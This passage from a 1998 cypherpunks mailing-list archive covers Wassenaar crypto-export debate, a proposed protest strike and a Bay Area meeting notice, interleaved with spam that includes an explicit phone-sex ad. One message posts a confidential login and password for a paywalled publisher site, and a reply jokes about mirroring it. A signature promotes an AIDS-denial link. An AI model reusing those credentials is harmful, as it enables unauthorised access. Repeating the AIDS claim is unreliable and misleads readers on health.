 	midtown near shopping and entertainment)
 
 $99	Hilton Clearwater Beach Resort - Clearwater, FL
 	(Located on 10 acres of white sandy beach
 	on the Gulf of Mexico)
 
 For reservations call Hilton at 1-800-774-1500 and
 ask for Hilton Value Rates. Visit Hilton online at:
 http://www.hilton.com
 
 ********TERMS & CONDITIONS**************
 
 GENERAL CONDITIONS: Fares shown are roundtrip, nonrefundable and are 
 subject to change. Changes to itinerary are not permitted. Fares do 
 not include Passenger Facility Charges of up to $12 depending on 
 itinerary.   Must use E-Ticketing for domestic travel. Credit card is 
 the only form of payment accepted when booked with TWA reservations. Offer is not available in conjunction 
 with any other discount, coupon or promotional offer. Seats are limited 
 and may not be available on all flights or days of the week. Tickets 
 must be purchased at time of booking and no later than 12/11/98. 
 Standby passengers are not allowed. Aviator miles not accrued when redeeming
 Aviator miles for fare discount. Travel is not allowed on Trans World 
 Express or any other carrier. Aviator miles are non-refundable and may not 
 be recredited to member's account once redeemed. Aviator earned and purchased
 upgrade certificates may not be used in conjunction with 5000 mile option. 
 
 
 DOMESTIC: All fares valid for outbound travel Saturday 12/12 and return travel
 Monday (12/14) or Tuesday (12/15).  Certain fares indicated are also available 
 for departure on Friday 12/11 after 7 p.m.  All travel to be completed by 12/15/98. 
 For 12/12 departures minimum stay is 2 days and maximum stay is 3 days. For 
 12/11 departures minimum stay is 3 days and maximum stay is 4 days. Select Fares $89
 and higher may be discounted by redeeming 5000 Aviator miles. 
 
 INTERNATIONAL: Tickets to Mexico City must be purchased at time of booking
 and not later than 12/13/98. Travel may originate in St. Louis only. Travel must begin between
 January 31 and February 28, 1999 and be completed by March 31, 1999.  Minimum stay
 is 3 days and maximum stay is 30 days. Tickets are nonrefundable and no changes 
 are permitted.  Fare does not include $32 in APHIS/Immigration/U.S. departure tax, $16.90 Mexico 
 International Airport Departure Tax, or $7.40 in Mexico International 
 Value Added Tax.  Travel to St. Maarten may originate in New York only. Depart 
 New York December 17-18 and return December 19-21, 24, 25. Electronic ticketing 
 is required. E-tickets may be issued by travel agency but booking must be done
 by TWA. Tickets are nonrefundable and non-changeable. Fare does not include 
 $47 in APHIS/U.S. Customs/Immigration/U.S. Departure Tax/Security Surcharge.
 
 Car Rental Conditions: 
 Taxes (including in California, VLF taxes ranging up to $1.89 per day), 
 registrations fee/tax reimbursement, and airport access fees/taxes, 
 if any, are extra. Optional CDW, liability insurance, fuel, additional
 driver fee, drop charges and other optional items are extra. Rates 
 higher for renters under age 25. Rates valid for economy rentals(unless stated otherwise by Alamo) 
 commencing on Friday and ending by 11:59 PM on Monday. Rates only valid 
 during week in which they are published via TWA Internet site. 
 A 24-hour advance reservation is required. Availability is limited. Two
 day minimum rental required. 
 
 Hotel Conditions: 
 Hilton Hotels and Resorts special rates are available only during 
 the specific week in which they are published via the TWA Hot 
 Deals Internet site and the HiltonNet Internet site. Limited 
 availability; rooms at these Hilton Value Rates are sold on a 
 first-come, first-served basis. Availability, rate, and terms of 
 occupancy are not guaranteed and will be confirmed at time of
 reservation. Participating hotels, rates and terms are subject 
 to change without notice. Single or double occupancy. Early check-in, 
 late check-out subject to availability. No extra charge for
 children when they stay in parents' or grandparents' room; 
 total room occupancy subject to local fire safety regulations
 and other applicable laws or regulations. Rates vary by season, 
 do not include any other fees or charges, including without 
 limitation state or local taxes or gratuities and are subject
 to change without notice. Advance booking required. Advance deposit
 may be required. Offer cannot be combined with any other special 
 discounts, coupons, certificates, special rates, promotional offers, 
 award stays, or meeting/group stays. Hilton reserves the right to 
 cancel any Hilton Value Rate at any time without notice. Hilton 
 is not responsible for the terms of other offers in the program, 
 or for any electronic, computer, telephone, security, virus 
 or any other problem or damage related to use of the 
 program or its offers.  
 
 
 
 
 
 
 
 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harmike@discruise.com
Date: Wed, 9 Dec 1998 19:18:18 -0800 (PST)
To: advertiser@sosglb.com
Subject: ACT NOW!!! Web Site Submission
Message-ID: <bulk.9133.19981210023423@allegra.sosglb.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1321
Lines: 25




                     *************************HOLIDAY SPECIAL ***********************

                                     Web Site Submission. Let the professionals

Submit your Site. Special ends DECEMBER 31. If your page qualifies and you are willing to make {in most cases] minor changes to your page for submission then 
Type "SUBMIT" in the subject field.  And leave your name, web address and or phone number and the best time to contact you. Submissions include the following.
1. If you QUALIFY, top 30 position, Goal is the top 10
2. Over 300 submission to advertising agencies
3. Submission to over 400 search engines
4 Submissions to top 100 Free for all links [FFA]
5. Reports on submission till your page is ranked
This one time special is for people that have tried to submit there site and have not been able to get ranked. If you have a site and have not yet submitted it please try this first and Save yourself money. If you have tried before and just can't get your page listed then we can help you. We know what it takes to get to the top. 
ACT NOW!!!! For only 49.95.......Remember your page has to Qualify first so please forward your address znd or  phone number so we can view your page.

Thank You,
Michael Hargrove
Preferred Enterprises
Advertise Agency/Search Engine Research Specialist





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 54+6
Date: Wed, 9 Dec 1998 12:06:49 -0800 (PST)
To: people@the_internet.net
Subject: CALL 1-800-HOT-PUSSY....CALL NOW!!
Message-ID: <199812092006.MAA18532@toad.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 651
Lines: 33


Hi Sexy,

I am lonely waiting for you to call me. Let me be the "Little Secret" in 
your life!

WARNING!!

These lines are extremely xxx-rated. Adults over 18 only!!! Sex starved
girls will give you a hot sexual experience you'll never forget. Not
recommended for people with weak hearts or bad backs!!!


Call 1-800-HOT-PUSSY(468-7877)

$2.99-$4.99 per min.        Billed by Teleworld
Visa/Mastercard/Amex      Must be over 18


Call 1-900-288-LIVE(5483) (US ONLY)

Billed as 1-ON-1 on your phone bill
$25.00 per call    Must be over 18


1-900-451-PUSSY(7877) (Canada)

$2.99-$4.99 per min. (US $)

CALL NOW!!!     CALL NOW!!!       CALL NOW!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Wed, 9 Dec 1998 22:19:45 -0800 (PST)
To: "Ted Rallis" <cypherpunks@toad.com
Subject: Re: News on Wassenaar anyone?
In-Reply-To: <882566D5.00704154.00@domino2.certicom.com>
Message-ID: <3.0.2.32.19981210005732.006e5af8@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1719
Lines: 79


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Good idea! Simply put a copyright notice in the unencrypted sig of 
all encrypted email.

Edwin


At 12:28 PM 12/9/98 -0800, you wrote:
>If cryptography protecting intellectual property is exempt from 
regulation,
>my words are now my intellectual property -- all of them.
>
>Ted
>
>
>
>
>
>Jan Garefelt <jang@pobox.se> on 12/08/98 11:11:33 AM
>
>To:   cypherpunks@toad.com
>cc:    (bcc: Ted Rallis/Certicom)
>Subject:  News on Wassenaar anyone?
>
>
>
>
>Does anyone have information on the new Wassenaar arrangement, or
>information on when official information will be available?
>
>I'm only interested in the crypto parts, and I have already read the
>Aaron/Reuter story found on
>http://www.crypto.com/reuters/show.cgi?article=912708583
>
>Thanks
>
>/Jan Garefelt
>
>
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNm9izEmNf6b56PAtEQLWOACdE1OSS7uKtTJqKHBSspIHXWliyngAmwb4
M/9u9ETy9CfxSPBm778FBUFl
=MVko
-----END PGP SIGNATURE-----


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm

When you blame others, you give up your power to change.
Dr. Robert Anthony

Libertarian Party of Hillsborough County, FL
   http://home.tampabay.rr.com/lphc

When a place gets crowded enough to require ID's, social collapse is not far
away. It is time to go elsewhere. The best thing about space travel is that
it made it possible to go elsewhere.

Lazarus Long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody <nobody@em07.em.springer.de>
Date: Wed, 9 Dec 1998 16:40:02 -0800 (PST)
To: undisclosed-recipients:;
Subject: Lecture Notes in Computer Science - free online Access
Message-ID: <199812100039.BAA17888@medoc.springer.de>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 765
Lines: 28


This Mail contains user ID and password!

------------------------------------------------------------
User ID: lncs
password: uid387xf
------------------------------------------------------------
Please keep in mind that:
- you agreed to keep these confidential
- systematic download is not permitted! 
------------------------------------------------------------
Your personal data as used in the registration form:
Surname:  cypherpunks
Christian name: cypherpunks
Institution/Company: cypherpunks
Department: cypherpunks
Streat/POBox: 101 cypherpunks drive
City: cypherpunks
Post Code: 00000
Country Code: BOLI
Phone: 
FAX: 
LINK Number: 
------------------------------------------------------------
from: link.springer.de/Lecture Notes in Computer Science




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mbishop645@aol.com
Date: Thu, 10 Dec 1998 00:31:35 -0800 (PST)
To: hab@gamegirlz.com
Subject: Re:  Re:
Message-ID: <ed7e707c.366f85d7@aol.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1011
Lines: 34


>HaB wrote:
><snip>
>>     That's a good place to begin, though.  "Would you send a letter to
>> someone without an envelope?"  "Then why not put your email in the
>> electronic equivalent of one?"
>> 
>> balance.
>
>Would I send a letter to someone without an envelope?
>One word: postcard.

Ahh, but would you tape a check for your phone bill to a postcard? Other 
than writing a greeting to someone what else do you use a postcard for?

 

---
Paul Weinstein 

<http://www.weinstein.org>           <webmaster@weinstein.org>
<http://members.aol.com/paulw37280>       <paulw37280@aol.com>
<http://www.waubonsie.com>                 <pdw@waubonsie.com>
<http://www.c2.net                                <pdw@c2.net>
---
Windows 98(n) - 32-bit extensions and graphical shell for a 16-bit patch
to an 8-bit operating system originally coded for a 4-bit microprocessor,
written by a 2-bit company that can't stand 1 bit of competition.
---
Visit LCARS: A Macintosh Reference at http://www.weinstein.org/lcars





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pete" <hfen@newmail.net>
Date: Thu, 10 Dec 1998 07:57:47 -0800 (PST)
To: fhg662@telegraph.co.uk
Subject: Between our..
Message-ID: <199812101547.PAA21090@ns0.telegraph.co.uk>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 899
Lines: 37

******************  InterScan Message (on ns0)

noname scanned and no virus found
*********************************************************




NO TRICKS - IT'S FREE! Process all major credit cards on your web
site.
NO MONTHLY COSTS, NO TRANSACTION FEES. CHECK IT OUT. You get:

- Virtual Terminal for phone/fax/mail orders
- Email receipt
- Recurring billing feature
- Password generation for membership sites
- Automatic batch closing
- Address Verification Service (AVS)
- Backoffice to access account history
- Remote mode
- Interface for all major shopping carts
- Installation included

For our free information package just reply to:
mailto:yetr@iname.com?subject=more_info

If you are interested in becoming an authorized
agent please reply to:
mailto:yetr@iname.com?subject=agent

If you wish to be removed from our mailing list
please reply to:
mailto:grekk2@hotbot.com?subject=remove





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony@secapl.com
Date: Thu, 10 Dec 1998 04:24:33 -0800 (PST)
To: maven@weirdness.com
Subject: Re:
In-Reply-To: <366F0A1A.654798B3@usachoice.com>
Message-ID: <Pine.A32.3.95.981210071832.33608A-100000@T2.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 482
Lines: 20


On Wed, 9 Dec 1998, Robert Wenzler wrote:

> <snip>
> >     That's a good place to begin, though.  "Would you send a letter to
> > someone without an envelope?"  "Then why not put your email in the
> > electronic equivalent of one?"
> > 
> > balance.
> 
> Would I send a letter to someone without an envelope?
> One word: postcard.

But would you do all your correspondence on postcards? Pay bills, etc? I
think there is a place for postcards, but most mail is in envelopes. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 10 Dec 1998 06:06:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Global Strike to protest Wassenaar
Message-ID: <Pine.SOL.4.05.9812100902510.28323-100000@ultra1-224wi.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1608
Lines: 49


-----BEGIN PGP SIGNED MESSAGE-----


Hi,

"Strike to protest Wassenaar!"

URL:  http://www.zanshin.com/~bobg/

"This is a global call for computer professionals to strike on 
Monday, 14 December, 1998 to protest the signing of the Wassenaar
Arrangement, an international treaty that imposes new restrictions 
on cryptographic software technology. The strike is meant to raise
awareness about the importance of cryptography, about the U.S. 
government's wrongheaded attempts to curtail its use, and about the 
strong-arm tactics used by the United States to pressure other 
countries into limiting their citizens' rights the way it has 
limited its own."


Regards,

Ken Williams

Packet Storm Security        http://www.Genocide2600.com/~tattooman/
E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/

___________________________________________________________________ 
Get Your Email Sniffed and Decrypted for Free at http://www.nsa.gov

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQEVAwUBNm/VQJDw1ZsNz1IXAQGzygf/Zt/sP419T5dA1gY/Rru7ACtv6xWXWMUA
HDBQPFbGV8yviOIU7N2bHndWGtr+hjPcdoudoXlOwYF73/TybNSzs6J/iAF9yhSR
UmRKM+suH8FwJ90F+i36W8hCQrkhPYXEwXW4AWDEeGNKjZdRLApS/POMcnTWoTSK
iHwDsdE+AevhlcWuC1nk80AlSEVNE/B2zmbWGax12tciM2NxTc4AqtqI3BwXebVq
f/04ZC9515dR/XHGhtbmQ08sTNS9eQUG8H626XE58XtE+MOsVEJYjUQFDd9L13T2
dlun/4+U1J9xMmN8uYlUySxKr9XmharSXLJCmpmIaE0bwDwTx7Pkpw==
=DaVN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 10 Dec 1998 11:48:15 -0800 (PST)
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Lecture Notes in Computer Science - free online Access
In-Reply-To: <199812100039.BAA17888@medoc.springer.de>
Message-ID: <19981210150255.B10407@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 431
Lines: 22


Has the mirror been completed yet? :)


Adam

On Thu, Dec 10, 1998 at 01:39:28AM +0100, Nobody wrote:
| This Mail contains user ID and password!
| 
| ------------------------------------------------------------
| User ID: lncs
| password: uid387xf
| ------------------------------------------------------------
| Please keep in mind that:
| - you agreed to keep these confidential
| - systematic download is not permitted! 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 10 Dec 1998 12:13:37 -0800 (PST)
To: dcsb@ai.mit.edu
Subject: Re: Global Strike to protest Wassenaar
In-Reply-To: <Pine.SOL.4.05.9812100902510.28323-100000@ultra1-224wi.eos.ncsu.edu>
Message-ID: <v04020a19b295d9b960d3@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1090
Lines: 36


At 9:05 AM -0500 on 12/10/98, Ken Williams wrote:

> "Strike to protest Wassenaar!"
>
> URL:  http://www.zanshin.com/~bobg/
>
> "This is a global call for computer professionals to strike on
> Monday, 14 December, 1998 to protest the signing of the Wassenaar
> Arrangement, an international treaty that imposes new restrictions
> on cryptographic software technology.

Now, *this* is interesting...

Anyone actually contemplating doing this?

I mean, we could *all* stand to do a little extra (meatspace) Christmas
shopping on Monday, right?

(Then, I guess, we could all do our cypherspace Christmas shopping on
*Tuesday*, just to drive the point home, stick-and-carrot-wise...)



Cheers,
Robert Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevlar <webmaster@max-web.com>
Date: Thu, 10 Dec 1998 16:36:06 -0800 (PST)
To: Missouri FreeNet Administration <cypherpunks@toad.com
Subject: Re: Global Strike to protest Wassenaar
In-Reply-To: <Pine.SOL.4.05.9812100902510.28323-100000@ultra1-224wi.eos.ncsu.edu>
Message-ID: <3.0.6.32.19981210163644.0088ec30@max-web.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 3661
Lines: 99


Not only will Maximum Web Design (www.max-web.com) not be operating on
December 14, I have plenty of bandwith for a page with all the
participants. Would be happy to maintain it too...

Please e-mail me. anti-wassenaar@max-web.com

Only serious requests -=WITH A URL=- will be accepted.
Will post the address to the list asap.

At 10:11 AM 12/10/98 -0600, you wrote:
>
>This is an excellent idea...  I have just massmailed an announcement
>to our members: Missouri FreeNet will not be be operating on 14 December.
>Has anyone considered creating a (web?) list of persons and organizations
>who have committed to this strike? People are more likely to participate
>when they know they are no alone...
>
>Yours, 
>J.A. Terranson
>sysadmin@mfn.org
>
>--
>If Governments really want us to behave like civilized human beings, they
>should give serious consideration towards setting a better example:
>Ruling by force, rather than consensus; the unrestrained application of
>unjust laws (which the victim-populations were never allowed input on in
>the first place); the State policy of justice only for the rich and 
>elected; the intentional abuse and occassionally destruction of entire
>populations merely to distract an already apathetic and numb electorate...
>This type of demogoguery must surely wipe out the fascist United States
>as surely as it wiped out the fascist Union of Soviet Socialist Republics.
>
>The views expressed here are mine, and NOT those of my employers,
>associates, or others.  Besides, if it *were* the opinion of all of
>those people, I doubt there would be a problem to bitch about in the
>first place...
>--------------------------------------------------------------------
>
>
>On Thu, 10 Dec 1998, Ken Williams wrote:
>
>:Date: Thu, 10 Dec 1998 09:05:58 -0500 (EST)
>:From: Ken Williams <jkwilli2@unity.ncsu.edu>
>:To: cypherpunks@toad.com
>:Subject: Global Strike to protest Wassenaar
>:
>:-----BEGIN PGP SIGNED MESSAGE-----
>:
>:
>:Hi,
>:
>:"Strike to protest Wassenaar!"
>:
>:URL:  http://www.zanshin.com/~bobg/
>:
>:"This is a global call for computer professionals to strike on 
>:Monday, 14 December, 1998 to protest the signing of the Wassenaar
>:Arrangement, an international treaty that imposes new restrictions 
>:on cryptographic software technology. The strike is meant to raise
>:awareness about the importance of cryptography, about the U.S. 
>:government's wrongheaded attempts to curtail its use, and about the 
>:strong-arm tactics used by the United States to pressure other 
>:countries into limiting their citizens' rights the way it has 
>:limited its own."
>:
>:
>:Regards,
>:
>:Ken Williams
>:
>:Packet Storm Security        http://www.Genocide2600.com/~tattooman/
>:E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
>:NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
>:PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/
>:
>:___________________________________________________________________ 
>:Get Your Email Sniffed and Decrypted for Free at http://www.nsa.gov
>:
>:-----BEGIN PGP SIGNATURE-----
>:Version: PGPfreeware 5.0i for non-commercial use
>:Charset: noconv
>:
>:iQEVAwUBNm/VQJDw1ZsNz1IXAQGzygf/Zt/sP419T5dA1gY/Rru7ACtv6xWXWMUA
>:HDBQPFbGV8yviOIU7N2bHndWGtr+hjPcdoudoXlOwYF73/TybNSzs6J/iAF9yhSR
>:UmRKM+suH8FwJ90F+i36W8hCQrkhPYXEwXW4AWDEeGNKjZdRLApS/POMcnTWoTSK
>:iHwDsdE+AevhlcWuC1nk80AlSEVNE/B2zmbWGax12tciM2NxTc4AqtqI3BwXebVq
>:f/04ZC9515dR/XHGhtbmQ08sTNS9eQUG8H626XE58XtE+MOsVEJYjUQFDd9L13T2
>:dlun/4+U1J9xMmN8uYlUySxKr9XmharSXLJCmpmIaE0bwDwTx7Pkpw==
>:=DaVN
>:-----END PGP SIGNATURE-----
>:
>:
>
-Kevlar <RulerAllMighty@max-web.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zoom Camera Offer <xoomoffer@aladdinsys.com>
Date: Thu, 10 Dec 1998 17:57:17 -0800 (PST)
To: "XOOM Camera Offer" <XOOMoffer@aladdinsys.com>
Subject: [ADV] Special XOOM Camera Offer
Message-ID: <v04020a00b29619a77da8@[204.147.235.240]>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 2879
Lines: 79


************************************
You have received this mailing as a result of joining our
information list.  If you would like to be removed from
this list please refer to the instructions found at the
bottom of this email.
************************************
Dear Aladdin Customer:

Did you ever want to participate in video chats,
send real-time video and video mail, or even add
moving or still pictures to almost any computer
document? Now you can, AND at a super-low price.

Aladdin has partnered with XOOM.com to offer you
The ZOOM Video Cam from that great modem company,
ZOOM Telephonics! It's the most affordable, full-color,
live-motion, digital camera for your PC. And because
of this special arrangement, we can offer it to you for
ONLY $79.95! This is a terrific price, as it normally
sells for $149.95. Hurry and order today,there are
LIMITED SUPPLIES!

To order, or for more information, go to this special URL:

http://orders.xoom.com/zvc/1wzvc1124/

Look at the great features of the ZOOM Telephonics
Video Camera:

** Easy Installation - Just plug the camera cable
into the included Zoom/Video Capture Card.
** Compact Design - Sits easily on your desk or
computer monitor with weighted base for excellent
stability. It can also be used with standard camera tripod.
** High Quality Optics - Has multi-element,
anti-reflection coating.  The focus is adjustable from
2 inches to infinity.
** Auto Focus - Automatic adjustment to lighting
conditions ensures excellent image quality under a
wide range of light conditions.

For video mail, just attach a video file for your friends
and family. Show them your pet, your new house, even
your new baby! ZOOM's video software attaches a "player"
application so that it can be viewed and heard on a PC
without any special hardware or software. The microphone
is included too, so all you need is a sound card.

The ZOOM Video Cam is also great for real-time chat or
business meetings. It's never been easier or more affordable
to have video on your PC!  Price is no longer an issue!
Because of this special arrangement we can offer it to
you for only $79.95! That's a savings of $70.  Hurry, this
offer ends December 31, 1998 or while supplies last.

http://orders.xoom.com/zvc/1wzvc1124/

All XOOM.com purchases come with a full, 30-day, no-fault,
money-back guarantee (less shipping and handling) from
XOOM.com on your purchase if you are not completely
satisfied for any reason. Order the ZOOM Video Cam today,
and START sharing your memories tomorrow.

Sincerely yours,
Aladdin and XOOM.com

***************************************
If you would prefer not to receive Aladdin news and
special offers in the future, please send an e-mail
to listserv@listserver.digitalriver.com with the words
"UNSUBSCRIBE Aladdin-Win" (without the quotes)
in the body of the e-mail.
***************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 10 Dec 1998 19:17:19 -0800 (PST)
To: cryptography@c2.net
Subject: [ANNOUNCE] SF Bay Area Cypherpunks Dec '98 Physical Meeting
Message-ID: <v04103614b295ed87e077@[192.168.248.7]>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 4447
Lines: 131


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SF Bay Area Cypherpunks, 80th Chairborne Regiment

December 1998 Physical Meeting Announcement

General Info:

  Sat 12 December 1998
  1:00 - 6:00 PM
  Mrs. Fields' Cookies shop*
  Embarcadero 4, Embarcadero Center complex
   - A few paces east of Drumm and Washington St.
   - Ground floor, North side
   - Near the payphones
   - (* Ever been to a 2600 meeting? Same location. Follow your nose.)

   The December Physical Meeting of the San Francisco Bay Area Cypherpunks
   will be held on Saturday 12 December 1998 from 1-6 PM. This is an "Open
   Meeting on US Soil" and, as always, members of the Public are encouraged
   to attend.

Meeting Agenda:

   "Our agenda is a widely-held secret."

 1:00-2:00
   Informal pre-meeting gathering
    - Accepting cookies from strangers, etc.

 2:00-6:00
   Agenda TBD on-the-fly at the meeting... Suggested topics:
   
   EFF UDHR Event post-event discussion <http://www.eff.org/udhr>
   Wassenaar recent news discussion
     <http://www.wassenaar.org/List/Table%20of%20Contents%20-%2098web.html>
     <http://www.fitug.de/news/wa/index.html>
   Anonymous Coward conferencing systems
   Non-US based crypto archives/CD-burning
   The recent Dutch "Hippiepunkje" visit (some XS4ALL folks were here)
   Zero-Knowledge Systems beta update <http://www.zks.net>
   Securify, Inc. <http://www.securify.com>
   Harmless Little Boxes discussion
   CryptoRights Foundation (brief update)
   CIPHR'99 conference update <http://www.ciphr.org>
   RSA 1999 Data Security Conference planning
   PGP Keysigning session:
    - Bring a printout of your key's fingerprint/keyid/size + photoID
    - Load your key info into your Pilot or Newton for IR beaming

 6:00-?
   Dinner at a nearby restaurant usually follows the meeting (see 
   meeting notes below).
   
Featured Speakers:

   (TBD)

Meeting Notes:

   At the December meeting, if there's consensus that it's cold outdoors
   at 2 PM, we'll probably move to the Uno's Pizzeria or Chevy's on the top
   level of the Embarcadero Complex (not the top floor of the tower, more
   like the fourth floor, accessible via the escalators or elevators).

   Someone please bring a GPS unit!

   If you haven't seen it yet, "Enemy of the State" is playing in SF at:
     AMC Kabuki 8          1:30-5:00-7:45-8:10-10:35
     Blumenfeld Regency   12:00-2:35-9:00
     Empire 3             11:30-2:15-5:00-7:45-10:30

Location Info:

   Southbound on Market St. from the Embarcadero/Steuart.
   HARD RIGHT on Drumm St. (not left on Spear).
   Beat it down to Washington St. (a block or two).
   RIGHT on Washington, into cul-de-sac.
   You can almost smell us from there. Or the cookies.
   The best way to get to Mrs. Fields' is to park _under_ it in the
   Embarcadero 4 parking lot, accessible from the cul-de-sac.
   NOTE: Get your PARKING VALIDATED and it's FREE!
   
   Food (non-magic cookies) and beverages are available at Mrs. Fields'.
   There are several other places nearby to grab a snack during the meeting.

Location Maps:

   Mrs. Fields' Cookies:
   <http://www.freedomfighter.net/maps/981212.jpg>
     (red star over Mrs. Fields)

............................................................................
<http://www.freedomfighter.net/cypherpunks/990116.html>

IMPORTANT HEADS-UP for January!

The January Physical Meeting WILL NOT be held on the usual second 
Saturday of the month, but rather on 16 January 1999 (the THIRD 
Saturday) to coincide with the RSA 1999 Data Security Conference
<http://www.rsa.com/conf99/> from 17-21 Jan), for which many cypherpunks
will be in town from all over the world.

We're currently scheduled (pending confirmation from the RSA 
conference chief, which seems likely) to have the meeting from 12 
Noon until 6 PM in the "B1" room (or possible "B2") in the SJCC (San 
Jose Convention Center), which is, conveniently, precisely where the 
RSA conference is being held.

Final meeting info will be available (here) at:
 <http://www.freedomfighter.net/cypherpunks/physical.html>

If you have any questions, please send them to the Jan co-organizers:
 Bill Stewart <bill.stewart@pobox.com>
 Dave Del Torto <ddt@lsd.com>



-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2
Comment: Get interested in computers -- they're interested in YOU!

iQA/AwUBNnB+2JBN/qMowCmvEQJ9JwCgyFBttf3aYQS5rWH96Qo2KL9VsoQAnRkl
m6cI3EWsSw/hxB6UsNlBdu4d
=K41q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Orrin <privsoft@ix.netcom.com>
Date: Thu, 10 Dec 1998 16:22:25 -0800 (PST)
To: Missouri FreeNet Administration <jkwilli2@unity.ncsu.edu>
Subject: Re: Global Strike to protest Wassenaar
In-Reply-To: <Pine.BSF.3.96.981210095155.7887B-100000@greeves.mfn.org>
Message-ID: <367062FA.AA2ADF58@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 3899
Lines: 99


I believe that a mass strike only hurts our employers, not the gov'ts
that are afflicting us with crap like Wassenaar. I propose that we
designate Monday "International Export Crypto Day". We should pick a
gov't agency or member (in a gov't other than our own) and email crypto 
to him/her. Mass effort will demonstrate the absolute idiocy of
regulations like Wassenaar. maybe even a mass chain letter with RSA in 3
lines of perl emailed all over the world and forward via typical chain
letter mechanisms. 

so
privsoft@ix.netcom.com


Missouri FreeNet Administration wrote:
> 
> This is an excellent idea...  I have just massmailed an announcement
> to our members: Missouri FreeNet will not be be operating on 14 December.
> Has anyone considered creating a (web?) list of persons and organizations
> who have committed to this strike? People are more likely to participate
> when they know they are no alone...
> 
> Yours,
> J.A. Terranson
> sysadmin@mfn.org
> 
> --
> If Governments really want us to behave like civilized human beings, they
> should give serious consideration towards setting a better example:
> Ruling by force, rather than consensus; the unrestrained application of
> unjust laws (which the victim-populations were never allowed input on in
> the first place); the State policy of justice only for the rich and
> elected; the intentional abuse and occassionally destruction of entire
> populations merely to distract an already apathetic and numb electorate...
> This type of demogoguery must surely wipe out the fascist United States
> as surely as it wiped out the fascist Union of Soviet Socialist Republics.
> 
> The views expressed here are mine, and NOT those of my employers,
> associates, or others.  Besides, if it *were* the opinion of all of
> those people, I doubt there would be a problem to bitch about in the
> first place...
> --------------------------------------------------------------------
> 
> On Thu, 10 Dec 1998, Ken Williams wrote:
> 
> :Date: Thu, 10 Dec 1998 09:05:58 -0500 (EST)
> :From: Ken Williams <jkwilli2@unity.ncsu.edu>
> :To: cypherpunks@toad.com
> :Subject: Global Strike to protest Wassenaar
> :
> :-----BEGIN PGP SIGNED MESSAGE-----
> :
> :
> :Hi,
> :
> :"Strike to protest Wassenaar!"
> :
> :URL:  http://www.zanshin.com/~bobg/
> :
> :"This is a global call for computer professionals to strike on
> :Monday, 14 December, 1998 to protest the signing of the Wassenaar
> :Arrangement, an international treaty that imposes new restrictions
> :on cryptographic software technology. The strike is meant to raise
> :awareness about the importance of cryptography, about the U.S.
> :government's wrongheaded attempts to curtail its use, and about the
> :strong-arm tactics used by the United States to pressure other
> :countries into limiting their citizens' rights the way it has
> :limited its own."
> :
> :
> :Regards,
> :
> :Ken Williams
> :
